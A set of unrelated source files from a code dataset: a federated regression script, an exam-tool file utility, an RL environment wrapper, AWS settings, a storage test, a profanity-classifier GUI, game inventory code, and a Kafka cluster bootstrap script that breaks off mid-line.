columns at each site and use global_beta_vector\n to calculate SSE at each local site.\n@modified: 01/14/2018 weighted average single shot regression\n\"\"\"\n\nimport os\nimport shelve\nimport numpy as np\nfrom numba import jit, prange\nimport pandas as pd\nimport scipy as sp\nfrom mcic_load_data import load_data\n\n@jit(nopython=True)\ndef singleshot_regression(X1, site_01_y1, X2, site_02_y1, X3, site_03_y1, X4,\n site_04_y1):\n\n size_y = site_01_y1.shape[1]\n\n params = np.zeros((X1.shape[1], size_y))\n sse = np.zeros(size_y)\n tvalues = np.zeros((X1.shape[1], size_y))\n rsquared = np.zeros(size_y)\n\n for voxel in prange(size_y):\n print(voxel)\n\n y1 = site_01_y1[:, voxel]\n y2 = site_02_y1[:, voxel]\n y3 = site_03_y1[:, voxel]\n y4 = site_04_y1[:, voxel]\n\n # Start of single shot regression\n beta1 = np.linalg.inv(X1.T @ X1) @ (X1.T @ y1)\n beta2 = np.linalg.inv(X2.T @ X2) @ (X2.T @ y2)\n beta3 = np.linalg.inv(X3.T @ X3) @ (X3.T @ y3)\n beta4 = np.linalg.inv(X4.T @ X4) @ (X4.T @ y4)\n\n # PART 02 - Aggregating parameter values at the remote\n count_y_local = np.array([len(y1), len(y2), len(y3), len(y4)])\n\n # Weighted Average\n count_y_local_float = count_y_local.astype(np.float64)\n sum_params = np.column_stack((beta1, beta2, beta3, beta4))\n avg_beta_vector = sum_params @ count_y_local_float / np.sum(count_y_local)\n\n# =============================================================================\n# # Simple Average\n# avg_beta_vector = (beta1 + beta2 + beta3 + beta4) / 4\n# =============================================================================\n\n params[:, voxel]= avg_beta_vector\n\n # PART 03 - SSE at each local site\n y1_estimate = np.dot(avg_beta_vector, X1.T)\n y2_estimate = np.dot(avg_beta_vector, X2.T)\n y3_estimate = np.dot(avg_beta_vector, X3.T)\n y4_estimate = np.dot(avg_beta_vector, X4.T)\n\n sse1 = np.linalg.norm(y1 - y1_estimate)**2\n sse2 = np.linalg.norm(y2 - y2_estimate)**2\n sse3 = np.linalg.norm(y3 - y3_estimate)**2\n sse4 = np.linalg.norm(y4 - y4_estimate)**2\n\n # At Local\n mean_y_local = np.array([np.mean(y1), np.mean(y2), np.mean(y3), np.mean(y4)])\n\n # At Remote\n mean_y_global = np.sum(\n mean_y_local * count_y_local) / np.sum(count_y_local)\n\n # At Local\n sst1 = np.sum(np.square(y1 - mean_y_global))\n sst2 = np.sum(np.square(y2 - mean_y_global))\n sst3 = np.sum(np.square(y3 - mean_y_global))\n sst4 = np.sum(np.square(y4 - mean_y_global))\n\n cov1 = X1.T @ X1\n cov2 = X2.T @ X2\n cov3 = X3.T @ X3\n cov4 = X4.T @ X4\n\n # PART 05 - Finding rsquared (global)\n SSE_global = sse1 + sse2 + sse3 + sse4\n sse[voxel] = SSE_global\n SST_global = sst1 + sst2 + sst3 + sst4\n r_squared_global = 1 - (SSE_global / SST_global)\n rsquared[voxel] = r_squared_global\n\n # PART 04 - Finding p-value at the Remote\n varX_matrix_global = cov1 + cov2 + cov3 + cov4\n\n dof_global = np.sum(count_y_local) - len(avg_beta_vector)\n\n MSE = SSE_global / dof_global\n var_covar_beta_global = MSE * np.linalg.inv(varX_matrix_global)\n se_beta_global = np.sqrt(np.diag(var_covar_beta_global))\n ts_global = avg_beta_vector / se_beta_global\n\n tvalues[:, voxel] = ts_global\n\n return (params, sse, tvalues, rsquared, dof_global)\n\n\nfolder_index = input('Enter the name of the folder to save results: ')\nfolder_name = folder_index.replace(' ', '_')\nif not os.path.exists(folder_name):\n os.makedirs(folder_name)\n\nX1, site_01_y1, X2, site_02_y1, X3, site_03_y1, X4, site_04_y1, column_name_list = load_data(\n)\n\n(params, sse, tvalues, rsquared, dof_global) = singleshot_regression(\n X1, site_01_y1, X2, site_02_y1, X3, site_03_y1, X4, site_04_y1)\n\n\nps_global = 2 * sp.stats.t.sf(np.abs(tvalues), dof_global)\npvalues = pd.DataFrame(ps_global.transpose(), columns=column_name_list)\nsse = pd.DataFrame(sse.transpose(), columns=['sse'])\nparams = pd.DataFrame(params.transpose(), columns=column_name_list)\ntvalues = pd.DataFrame(tvalues.transpose(), columns=column_name_list)\nrsquared = pd.DataFrame(rsquared.transpose(), columns=['rsquared_adj'])\n\n# %% Writing to a file\nprint('Writing data to a shelve file')\nresults = shelve.open(os.path.join(folder_name, 'singleshotWA_results'))\nresults['params'] = params\nresults['sse'] = sse\nresults['pvalues'] = pvalues\nresults['tvalues'] = tvalues\nresults['rsquared'] = rsquared\nresults.close()\n","sub_path":"mcic_regression_singleshot.py","file_name":"mcic_regression_singleshot.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"335985491","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.8-x86_64/egg/vint/file_util.py\n# Compiled at: 2013-04-19 06:08:22\nfrom __future__ import unicode_literals\nimport json, logging, os, codecs\n__author__ = b'tchen'\nlogger = logging.getLogger(__name__)\nFIRST_EXTENSIONS = [\n b'.h']\nINSTRUCTION_FILE = b'README'\nEXAM_CONFIG_FILE = b'.interview.json'\nCASE_CONFIG_FILE = b'.case.json'\nEXAM_INSTRUCTION_TEMPLATE = b'\\nHello %(applicant)s, Welcome to exam %(name)s\\n\\n%(description)s\\n\\nInstructions:\\n\\n1. Write the code as fast as you can. Optimize when you have further time.\\n2. Verify the correctness and robustness of your code with proper output.\\n3. When you finish the exam, please go back to this directory (where you see this file), and execute \"vint finish\".\\n This is very important to do so since we will time your exam and submit your result back to the hiring manager.\\n\\nStart your journey now, pal!\\n\\n'\nCASE_INSTRUCTION_TEMPLATE = b\"\\n\\nCase%(position)d: %(name)s\\n\\n%(description)s\\n\\nInstructions:\\n\\n1. You need to code in %(lang)s, with acceptable extentisons: %(extentions)s.\\n2. You'd better to write down the code inside one file unless you find it is not readable.\\n\"\n\ndef write_file(filename, content):\n f = codecs.open(filename, b'w+', encoding=b'utf8')\n f.write(content)\n f.close()\n\n\nclass Template(object):\n\n @staticmethod\n def create_exam_config(exam_path, interview):\n filename = os.path.join(os.getcwd(), exam_path, EXAM_CONFIG_FILE)\n content = json.dumps(interview)\n write_file(filename, content)\n\n @staticmethod\n def create_exam_instruction(exam_path, interview, exam):\n filename = os.path.join(os.getcwd(), exam_path, INSTRUCTION_FILE)\n content = EXAM_INSTRUCTION_TEMPLATE % {b'applicant': interview[b'applicant'], \n b'name': exam[b'name'], \n b'description': exam[b'description']}\n write_file(filename, content)\n\n @staticmethod\n def create_case_config(case_path, case):\n filename = os.path.join(case_path, CASE_CONFIG_FILE)\n content = json.dumps(case)\n write_file(filename, content)\n\n @staticmethod\n def create_case_instruction(case_path, case):\n instruction = os.path.join(case_path, INSTRUCTION_FILE)\n content = CASE_INSTRUCTION_TEMPLATE % {b'position': case[b'position'], \n b'name': case[b'name'], \n b'description': case[b'description'], \n b'lang': case[b'lang'], \n b'extentions': case[b'extentions']}\n write_file(instruction, content)\n\n @staticmethod\n def create_case_code(case_path, case):\n ext = case[b'extentions'].split(b',')[0].strip()\n filename = os.path.join(case_path, b'main%s' % ext)\n write_file(filename, case[b'code'])\n\n\nclass FileUtil(object):\n\n @staticmethod\n def read_content(filename):\n return codecs.open(filename, b'r', encoding=b'utf8').read()\n\n @staticmethod\n def get_valid_files(path, extentions):\n first_list = []\n second_list = []\n normal_list = []\n for root, dirs, files in os.walk(path):\n for f in files:\n for ext in extentions:\n if f.endswith(ext):\n normal_list.append(f)\n break\n\n for f in normal_list:\n for ext in FIRST_EXTENSIONS:\n if f.endswith(ext):\n first_list.append(f)\n break\n else:\n second_list.append(f)\n\n return (\n first_list, second_list)\n\n @staticmethod\n def read_case(path):\n return FileUtil.read_json(path, CASE_CONFIG_FILE)\n\n @staticmethod\n def read_json(path, name):\n filename = os.path.join(path, name)\n return json.load(codecs.open(filename, b'r', encoding=b'utf8'))\n\n @staticmethod\n def read_interview(path):\n return FileUtil.read_json(path, EXAM_CONFIG_FILE)\n\n @staticmethod\n def interview_exists():\n return os.path.exists(EXAM_CONFIG_FILE)","sub_path":"pycfiles/vint-0.1.5-py2.7/file_util.py","file_name":"file_util.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"486263412","text":"from dam import Dam\n\nimport math\nimport numpy as np\nfrom numpy.linalg import norm\nfrom gym.envs.registration import register\n\n#Radial Basis Function\ndef rbf(c,w,s):\n return math.exp(-norm(s-c)/w)\n\ndef spaceout(n,lo,hi):\n step = (hi - lo)/(n+1)\n return [lo+k*step for k in range(1,n+1)]\n \nregister(\n id='DamWrap-v0',\n entry_point='dam_wrap:DamWrap',\n)\n\n#Wrapper for Dam environment\nclass DamWrap(Dam):\n def __init__(self,dreward=2,penalize=False):\n self.centers = spaceout(2,-20,190)\n self.dim = len(self.centers)+1\n self.width = 60 \n \n super(DamWrap,self).__init__()\n \n self.obj_weights = [0.5,0.5]\n assert len(self.obj_weights)==dreward\n assert sum(self.obj_weights)==1\n\n def features(self,s):\n features = [1]\n for c in self.centers:\n features.append(rbf(c,self.width,s))\n return features\n\n def step(self,action,noise,render=False):\n s,r,done,info = super(DamWrap,self).step(action,render,noise)\n \n #Model state: RBFs\n new_s = self.features(s) \n\n #Model reward: convex combination\n new_r = np.dot(self.obj_weights,r)\n\n return np.array(new_s),new_r,done,info\n\n def reset(self,state=None,scalar=False):\n super(DamWrap,self).reset(state)\n if not scalar:\n return np.array(self.features(self.get_state()))\n else:\n return self.get_state()\n","sub_path":"dam/dam_wrap.py","file_name":"dam_wrap.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"249629905","text":"\"\"\"\nSettings for maintaining and running an AWS Lambda function.\n\nauthor: Shang-Lin Chen\n\n\"\"\"\n\nAWS_PROFILE = 'default' # Profile in .aws/credentials\n # that has S3 and Lambda permissions.\n\nAWS_REGION = 'us-west-2' # AWS region where the lambda function\n # is deployed. Should be the same\n # region as all S3 buckets.\n\n# AWS IAM role that has Lambda and S3 permissions.\nIAM_ROLE = 'put_iam_role_here'\n\nLAMBDA_FUNCTION = 'DecimationFunc' # Name of your lambda function.\n\nLAMBDA_BUCKET = 'lambda-venv-bucket' # Name of the S3 bucket that will \n # store a zip file containing \n # the lambda function and environment.\n\n# Description of what your lambda function does.\n# This is one of the settings sent to AWS.\nLAMBDA_DESCRIPTION = 'Testing Lambda with ObsPy!'\n\nINPUT_BUCKET = 'scedc-pds' # S3 bucket used as s3_input_bucket.\n # This does not need to be modified\n # if using the SCEDC Public Data Set.\n\nOUTPUT_BUCKET = 'output-bucket' # Name of the S3 bucket where Lambda\n # output will be written.\n\nNCORES = 4 # Number of cores to use for calling Lambda function.\n\n","sub_path":"pds-lambda-example/settings_example.py","file_name":"settings_example.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"426761252","text":"# -*- coding: utf-8 -*-\n\nfrom itertools import chain, product\n\nfrom nose.tools import raises\n\nimport friendlysam as fs\nfrom friendlysam import Storage, FlowNetwork\n\nfrom friendlysam.tests.simple_models import Producer, Consumer, RESOURCE\nfrom friendlysam.tests import default_solver, approx\nfrom friendlysam import Problem, Minimize, Sum\n\ndef test_basic_functionality():\n times = range(1,4)\n\n consumption = lambda t: t * 1.5\n V0 = 10\n\n p = Producer(name='Producer')\n c = Consumer(consumption, name='Consumer')\n s = Storage(RESOURCE, capacity=15, name='Storage')\n s.volume(0).value = V0\n rn = FlowNetwork(RESOURCE)\n rn.connect(p, s)\n rn.connect(s, c)\n\n prob = Problem()\n prob += (part.constraints.make(t) for part, t in product(rn.descendants_and_self, times))\n\n prob.objective = Minimize(Sum(p.cost(t) for t in times))\n\n solution = default_solver.solve(prob)\n\n for t in times:\n c.activity(t).take_value(solution)\n p.activity(t).take_value(solution)\n s.volume(t).take_value(solution)\n\n for t in times:\n assert approx(p.activity(t).value, 0)\n assert approx(c.consumption[RESOURCE](t).value, consumption(t))\n assert approx(s.volume(t).value, s.volume(t-1).value + s.accumulation[RESOURCE](t-1).value)\n","sub_path":"friendlysam/tests/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"341455015","text":"\"\"\"\nClassify sentences using trained LinearSVC\n\"\"\"\n\nimport tkinter as tk\nimport pkg_resources\nimport joblib\n\nvectorizer = joblib.load(pkg_resources.resource_filename('Project', 'LinearSVC Approach/vectorizer.joblib'))\nmodel = joblib.load(pkg_resources.resource_filename('Project', 'LinearSVC Approach/model.joblib'))\n\ntext_color = 'black'\n\n\ndef classify_text():\n \"\"\"Classify a text as profane or not-profane\n \"\"\"\n word = ent_word.get(\"1.0\", tk.END)\n result = model.predict(vectorizer.transform([word]))\n if result[0] == 0:\n lbl_classification[\"text\"] = 'Result : Not profane.'\n else:\n lbl_classification[\"text\"] = 'Result : Profane.'\n\n\nwindow = tk.Tk()\nwindow.title(\"Word Classifier\")\n\n\ndef handle_keypress(event):\n \"\"\"Reset classification.\"\"\"\n # print(event.char)\n lbl_classification[\"text\"] = ''\n\n\n# Bind keypress event to handle_keypress()\nwindow.bind(\"\", handle_keypress)\n\nfrm_entry = tk.Frame(master=window)\nlbl_instruction = tk.Label(master=frm_entry, text=\"Enter the sentence to classify :\")\nlbl_instruction.config(font=(\"Courier\", 20))\nent_word = tk.Text(master=frm_entry, width=100, height=5)\nlbl_instruction.grid(row=0, column=0, sticky=\"we\")\nent_word.grid(row=1, column=0, sticky=\"we\")\nbtn_convert = tk.Button(\n master=window,\n text=\"Classify \\N{RIGHTWARDS BLACK ARROW}\",\n command=classify_text\n)\nlbl_classification = tk.Label(master=window, text=\"\", fg=text_color)\nlbl_classification.config(font=(\"Courier\", 40))\nfrm_entry.grid(row=0, column=0, padx=10)\nbtn_convert.grid(row=1, column=0, padx=10, pady=10, sticky=\"w\")\nlbl_classification.grid(row=1, column=0, padx=10, sticky=\"e\")\n\nwindow.mainloop()\n","sub_path":"Gui/classify_sentence.py","file_name":"classify_sentence.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"379920576","text":"from gui.messages import Message\n\n\nclass Inventory:\n def __init__(self, capacity=26, items=None):\n self.owner = None\n if items is None:\n items = []\n self.capacity = capacity\n self.items = items\n\n def add_to_inv(self, item):\n if len(self.items) + 1 <= self.capacity:\n self.items.append(item)\n return True\n else:\n return False\n\n def remove_from_inv(self, item):\n \"\"\" removes an item from the player main inventory or any quick use slots \"\"\"\n if item in (self.items):\n self.items.remove(item)\n else:\n # check all quick use slots if the item wasn't found\n for e in self.owner.paperdoll.equipped_items:\n if getattr(e, 'slots',0):\n if item in e.qu_inventory.items:\n e.qu_inventory.items.remove(item)\n\n def is_full(self):\n return True if len(self.items) == self.capacity else False\n\nclass QuickUseInv(Inventory):\n def __init__(self, capacity =6, attached_to=None):\n super().__init__(capacity=capacity)\n\n self.attached_to = attached_to\n\n def add_to_qu(self, item):\n owner = self.attached_to.owner\n if owner:\n # # get the index of the first slot returning None\n # #try:\n # #idx = next(idx for idx, v in enumerate(self.items) if v is None)\n # # if that fails (all slots taken) return false\n # except:\n # return False\n #if owner.inventory.add_to_inv(item):\n #else:\n # if item is added to the qu inventory, remove it from the owner inventory\n if self.add_to_inv(item):\n #self.items[idx] = item\n owner.inventory.remove_from_inv(item)\n return True\n else:\n return False\n\n\n def remove_from_qu(self, item):\n owner = self.attached_to.owner\n if owner:\n if owner.inventory.add_to_inv(item):\n self.items[self.items.index(item)] = None\n return True\n else:\n return False\n\n def empty_to_inv(self):\n owner = self.attached_to.owner\n for i in self.items:\n #if i is not None:\n if owner.inventory.add_to_inv(i):\n Message('You move the {0} from your {1} to your backpack.'.format(i.name, self.attached_to))\n else:\n Message('As your backpack is full, you had to drop the {0} on the ground.'.format(i.name, self.attached_to))\n i.drop()\n\n # empty the inventory of removed quick-use equipment\n self.items = []\n # for i in range(self.capacity):\n # self.items[i] = None\n\n def swap_qu_inv(self, other_inv):\n \"\"\" swaps the contents of two quick_use inventories \"\"\"\n for i in self.items:\n if len(other_inv.items) + 1 <= other_inv.capacity:\n other_inv.items.append(i)\n Message('You move the {0} to your new {1}.'.format(i.name, other_inv.attached_to))\n\n # any items still stored are dumped to the inventory\n if len(self.items):\n self.empty_to_inv()\n","sub_path":"components/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"391183474","text":"#!/usr/bin/env python\n\"\"\" Kafka Bootstrap Script (based on Kafka 1.0.0 release) \"\"\"\nimport datetime\nimport logging\nimport os\nimport shutil\nimport signal\nimport socket\nimport sys\nimport time\nimport urllib.error\nimport urllib.request\nimport uuid\nfrom optparse import OptionParser\n\nimport hostlist\nimport pkg_resources\nfrom pykafka import KafkaClient\n\nfrom pilot.util.ssh_utils import execute_ssh_command, execute_ssh_command_as_daemon\n\nlogging.basicConfig(level=logging.DEBUG)\n\n# For automatic Download and Installation\n# VERSION=\"0.10.1.0\"\nVERSION = \"2.8.1\" \n# KAFKA_DOWNLOAD_URL = \"http://www-us.apache.org/dist/kafka/\" + VERSION + \"/kafka_2.11-\" + VERSION + \".tgz\"\n# KAFKA_DOWNLOAD_URL = \"http://apache.mirrors.lucidnetworks.net/kafka/\"+ VERSION + \"/kafka_2.11-\" + VERSION + \".tgz\"\n# KAFKA_DOWNLOAD_URL = \"http://mirrors.gigenet.com/apache/kafka/\"+ VERSION + \"/kafka_2.11-\" + VERSION + \".tgz\"\n# KAFKA_DOWNLOAD_URL = \"http://mirrors.gigenet.com/apache/kafka/\" + VERSION + \"/kafka_2.13-\" + VERSION + \".tgz\"\n# KAFKA_DOWNLOAD_URL = \"https://downloads.apache.org/kafka/\" + VERSION + \"/kafka_2.13-\" + VERSION + \".tgz\"\n\nKAFKA_DOWNLOAD_URL = \"https://archive.apache.org/dist/kafka/\" + VERSION + \"/kafka_2.13-\" + VERSION + \".tgz\"\nWORKING_DIRECTORY = os.path.join(os.getcwd())\n\n# For using an existing installation\nKAFKA_HOME = os.path.join(os.getcwd(), \"kafka-\" + VERSION)\nKAFKA_CONF_DIR = os.path.join(KAFKA_HOME, \"etc\")\n\nSTOP = False\n\n\ndef handler(signum, frame):\n logging.debug(\"Signal catched. Stop Kafka\")\n global STOP\n STOP = True\n time.sleep(10)\n os.system(\"killall java\")\n sys.exit(0)\n\n\n\nclass KafkaBootstrap():\n\n def __init__(self, working_directory, kafka_home, config_name=\"default\", extension_job_id=None):\n self.working_directory = working_directory\n self.kafka_home = kafka_home\n self.config_name = config_name\n self.jobid = \"kafka-\" + str(uuid.uuid1())\n self.job_working_directory = os.path.join(WORKING_DIRECTORY)\n self.job_conf_dir = os.path.join(self.job_working_directory, \"config\")\n self.extension_job_id = extension_job_id\n self.broker_config_files = {}\n try:\n os.makedirs(self.job_conf_dir)\n os.system(\"rm -rf /tmp/zookeeper*\")\n os.system(\"rm -rf /tmp/kafka-logs*\")\n except:\n pass\n\n def get_server_properties(self, master, hostname, broker_id):\n module = \"pilot.plugins.kafka.configs.\" + self.config_name\n print((\"Access config in module: \" + module + \" File: server.properties\"))\n my_data = pkg_resources.resource_string(module, \"server.properties\").decode(\"utf-8\")\n # print(my_data)\n # Find out external IP\n external_ip = hostname\n try:\n # check whether this host has an external ip that should be used\n external_ip = urllib.request.urlopen('https://ident.me').read().decode('utf8')\n logging.debug(\"External IP discovered: {}\".format(external_ip))\n except:\n logging.debug(\"No external IP discovered.\")\n\n # have at least 4 Kafka log directories containing broker id in config template\n my_data = my_data % (broker_id, hostname, external_ip, broker_id, broker_id, broker_id, broker_id, master)\n my_data = os.path.expandvars(my_data)\n return my_data\n\n def get_zookeeper_properties(self, hostname):\n module = \"pilot.plugins.kafka.configs.\" + self.config_name\n logging.debug(\"Access config in module: \" + module + \" File: zookeeper.properties\")\n my_data = pkg_resources.resource_string(module, \"zookeeper.properties\").decode(\"utf-8\")\n return my_data\n\n #######################################################################################\n ## Get Node List from Resource Management System\n @staticmethod\n def get_pbs_allocated_nodes():\n print(\"Init PBS\")\n pbs_node_file = os.environ.get(\"PBS_NODEFILE\")\n if pbs_node_file == None:\n return [\"localhost\"]\n f = open(pbs_node_file)\n nodes = f.readlines()\n for i in nodes:\n i.strip()\n f.close()\n return list(set(nodes))\n\n @staticmethod\n def get_sge_allocated_nodes():\n logging.debug(\"Init SGE or Local\")\n sge_node_file = os.environ.get(\"PE_HOSTFILE\")\n if sge_node_file == None:\n return [\"localhost\"]\n f = open(sge_node_file)\n sgenodes = f.readlines()\n f.close()\n nodes = []\n for i in sgenodes:\n columns = i.split()\n try:\n for j in range(0, int(columns[1])):\n print((\"add host: \" + columns[0].strip()))\n nodes.append(columns[0] + \"\\n\")\n except:\n pass\n nodes.reverse()\n return list(set(nodes))\n\n @staticmethod\n def get_slurm_allocated_nodes():\n print(\"Init nodefile from SLURM_NODELIST\")\n hosts = os.environ.get(\"SLURM_NODELIST\")\n if hosts == None:\n return [\"localhost\"]\n\n print(\"***** Hosts: \" + str(hosts))\n hosts = hostlist.expand_hostlist(hosts)\n number_cpus_per_node = 1\n if os.environ.get(\"SLURM_CPUS_ON_NODE\") != None:\n number_cpus_per_node = int(os.environ.get(\"SLURM_CPUS_ON_NODE\"))\n freenodes = []\n for h in hosts:\n # for i in range(0, number_cpus_per_node):\n freenodes.append((h + \"\\n\"))\n return list(set(freenodes))\n\n @staticmethod\n def get_nodelist_from_resourcemanager():\n if (os.environ.get(\"PBS_NODEFILE\") != None and os.environ.get(\"PBS_NODEFILE\") != \"\"):\n nodes = KafkaBootstrap.get_pbs_allocated_nodes()\n elif (os.environ.get(\"SLURM_NODELIST\") != None):\n nodes = KafkaBootstrap.get_slurm_allocated_nodes()\n else:\n nodes = KafkaBootstrap.get_sge_allocated_nodes()\n return nodes\n\n #######################################################################################\n def configure_kafka(self):\n logging.debug(\"Kafka Instance Configuration Directory: \" + self.job_conf_dir)\n nodes = self.get_nodelist_from_resourcemanager()\n logging.debug(\"Kafka nodes: \" + str(nodes))\n master = socket.gethostname().split(\".\")[0]\n\n for idx, node in enumerate(nodes):\n path = os.path.join(self.job_conf_dir, \"broker-%d\" % idx)\n try:\n os.makedirs(path)\n except:\n pass #do nothing as path exists\n server_properties_filename = os.path.join(path, \"server.properties\")\n server_properties_file = open(server_properties_filename, \"w\")\n server_properties_file.write(\n self.get_server_properties(master=master, hostname=node.strip(), broker_id=idx))\n server_properties_file.close()\n self.broker_config_files[node] = server_properties_filename\n\n zookeeper_properties_file = open(os.path.join(self.job_conf_dir, \"zookeeper.properties\"), \"w\")\n zookeeper_properties_file.write(self.get_zookeeper_properties(master))\n zookeeper_properties_file.close()\n\n def start_kafka(self):\n logging.debug(\"Start Kafka\")\n os.system(\"killall -s 9 java\")\n os.system(\"pkill -9 java\")\n time.sleep(5)\n\n logging.debug(\"Start Zookeeper\")\n start_command = os.path.join(self.kafka_home, \"bin/zookeeper-server-start.sh\") + \" -daemon \" + os.path.join(\n self.job_conf_dir, \"zookeeper.properties\")\n logging.debug(\"Execute: %s\" % start_command)\n os.system(\". ~/.bashrc & \" + start_command)\n\n logging.debug(\"Start Kafka Cluster\")\n # remove dangling keys referencing localhost\n os.system(\"ssh-keygen -f $HOME/.ssh/known_hosts -R localhost\")\n for node in list(self.broker_config_files.keys()):\n config = self.broker_config_files[node]\n start_command = os.path.join(self.kafka_home, \"bin/kafka-server-start.sh\") + \" -daemon \" + config\n result = execute_ssh_command_as_daemon(node.strip(),\n user=None,\n command=start_command,\n keyfile=None)\n print(\"Host: {} Command: {} Result: {}\".format(node.strip(), start_command, result))\n #logging.debug(\"Execute: %s\" % start_command)\n #os.system(\". ~/.bashrc & \" + start_command)\n\n print((\"Kafka started with configuration: %s\" % self.job_conf_dir))\n\n def check_kafka(self):\n brokers = {}\n try:\n master = socket.gethostname().split(\".\")[0]\n client = KafkaClient(zookeeper_hosts=master + \":2181\")\n brokers = client.brokers\n except:\n pass\n print(\"Found %d brokers: %s\" % (len(list(brokers.keys())), str(brokers)))\n return brokers\n\n def start(self):\n self.configure_kafka()\n self.start_kafka()\n\n ##################################################################################################################\n # Extend cluster\n def start_kafka_extension(self):\n logging.debug(\"Start Kafka\")\n os.system(\"killall -s 9 java\")\n os.system(\"pkill -9 java\")\n time.sleep(5)\n\n logging.debug(\"Start Kafka Cluster\")\n # remove dangling keys referencing localhost\n os.system(\"ssh-keygen -f $HOME/.ssh/known_hosts -R localhost\")\n\n for node in list(self.broker_config_files.keys()):\n config = self.broker_config_files[node]\n start_command = os.path.join(self.kafka_home, \"bin/kafka-server-start.sh\") + \" -daemon \" + config\n result = execute_ssh_command(node.strip(),\n user=None,\n command=start_command,\n keyfile=None)\n print(\"Host: {} Command: {} Result: {}\".format(node.strip(), start_command, result))\n\n #logging.debug(\"Execute: %s\" % start_command)\n #os.system(\". ~/.bashrc & \" + start_command)\n\n print((\"Kafka started with configuration: %s\" % self.job_conf_dir))\n\n def configure_kafka_extension(self):\n logging.debug(\"Kafka Instance Configuration Directory: \" + self.job_conf_dir)\n nodes = self.get_nodelist_from_resourcemanager()\n logging.debug(\"Kafka nodes: \" + str(nodes))\n master = self.find_parent_zookeeper()\n max_id = self.find_max_broker_id()\n for node in nodes:\n idx = max_id + 1\n path = os.path.join(self.job_conf_dir, \"broker-%d\" % idx)\n try:\n os.makedirs(path)\n except:\n pass # do nothing as path exist\n server_properties_filename = os.path.join(path, \"server.properties\")\n server_properties_file = open(server_properties_filename, \"w\")\n server_properties_file.write(\n self.get_server_properties(master=master, hostname=node.strip(), broker_id=idx))\n server_properties_file.close()\n self.broker_config_files[node] = server_properties_filename\n\n def find_max_broker_id(self):\n path_to_parent_kafka_configs = os.path.join(os.getcwd(), \"..\", self.extension_job_id, \"config\")\n files = os.listdir(path_to_parent_kafka_configs)\n max_id = 0\n for i in files:\n bid = 0\n try:\n bid = int(i[-1])\n except:\n pass\n if bid > max_id:\n max_id = bid\n return max_id\n\n def find_parent_zookeeper(self):\n path_to_parent_spark_job = os.path.join(os.getcwd(), \"..\", self.extension_job_id,\n \"config/broker-0/server.properties\")\n print(\"Master of Parent Cluster: %s\" % path_to_parent_spark_job)\n zk = None\n with open(path_to_parent_spark_job, \"r\") as config:\n lines = config.readlines()\n for line in lines:\n if line.startswith(\"zookeeper.connect=\"):\n zk = line.strip().split(\"=\")[1]\n zk = zk.split(\":\")[0]\n\n logging.debug(\"Parent Zookeeper: %s\" % zk)\n return zk\n\n def extend(self):\n self.configure_kafka_extension()\n self.start_kafka_extension()\n\n ##################################################################################################################\n # Stop\n def stop(self):\n self.stop_kafka()\n\n def stop_kafka(self):\n logging.debug(\"Stop Kafka\")\n self.set_env()\n stop_command = os.path.join(KAFKA_HOME, \"bin/kafka-server-stop.sh\")\n logging.debug(\"Execute: %s\" % stop_command)\n stop_command = os.path.join(KAFKA_HOME, \"bin/zookeeper-server-stop.sh\")\n logging.debug(\"Execute: %s\" % stop_command)\n os.system(stop_command)\n\n ##################################################################################################################\n # Utils\n\n\n#########################################################\n# main #\n#########################################################\nif __name__ == \"__main__\":\n\n signal.signal(signal.SIGALRM, handler)\n signal.signal(signal.SIGABRT, handler)\n signal.signal(signal.SIGQUIT, handler)\n signal.signal(signal.SIGINT, handler)\n\n parser = OptionParser()\n parser.add_option(\"-s\", \"--start\", action=\"store_true\", dest=\"start\",\n help=\"start Kafka\", default=True)\n parser.add_option(\"-j\", \"--job\", type=\"string\", action=\"store\", dest=\"jobid\",\n help=\"Job ID of Kafka Cluster to Extend\")\n parser.add_option(\"-q\", \"--quit\", action=\"store_false\", dest=\"start\",\n help=\"terminate Hadoop\")\n parser.add_option(\"-c\", \"--clean\", action=\"store_true\", dest=\"clean\",\n help=\"clean Kafka topics in Zookeeper after termination\")\n\n parser.add_option(\"-n\", \"--config_name\", action=\"store\", type=\"string\", dest=\"config_name\", default=\"default\")\n # parser.add_option(\"-m\", \"--machines\", action=\"store\", type=\"string\", dest=\"config_name\")\n\n (options, args) = parser.parse_args()\n config_name = options.config_name\n logging.debug(\"Bootstrap Kafka on \" + socket.gethostname())\n\n node_list = KafkaBootstrap.get_nodelist_from_resourcemanager()\n number_nodes = len(node_list)\n print(\"nodes: %s\" % str(node_list))\n\n\n #################################################################################################################\n # Download Kafka\n run_timestamp = datetime.datetime.now()\n performance_trace_filename = \"kafka_performance_\" + run_timestamp.strftime(\"%Y%m%d-%H%M%S\") + \".csv\"\n kafka_config_filename = \"kafka_config_\" + run_timestamp.strftime(\"%Y%m%d-%H%M%S\")\n try:\n os.makedirs(WORKING_DIRECTORY)\n except:\n pass\n performance_trace_file = open(os.path.join(WORKING_DIRECTORY, performance_trace_filename), \"a\")\n start = time.time()\n # performance_trace_file.write(\"start_time, %.5f\"%(time.time()))\n\n filename = os.path.basename(KAFKA_DOWNLOAD_URL)\n kafka_home = \"\"\n if not os.path.exists(KAFKA_HOME):\n try:\n os.makedirs(WORKING_DIRECTORY)\n except:\n pass\n\n download_destination = os.path.join(WORKING_DIRECTORY, filename)\n if os.path.exists(download_destination) == False:\n logging.debug(\"Download: %s to %s\" % (KAFKA_DOWNLOAD_URL, download_destination))\n opener = 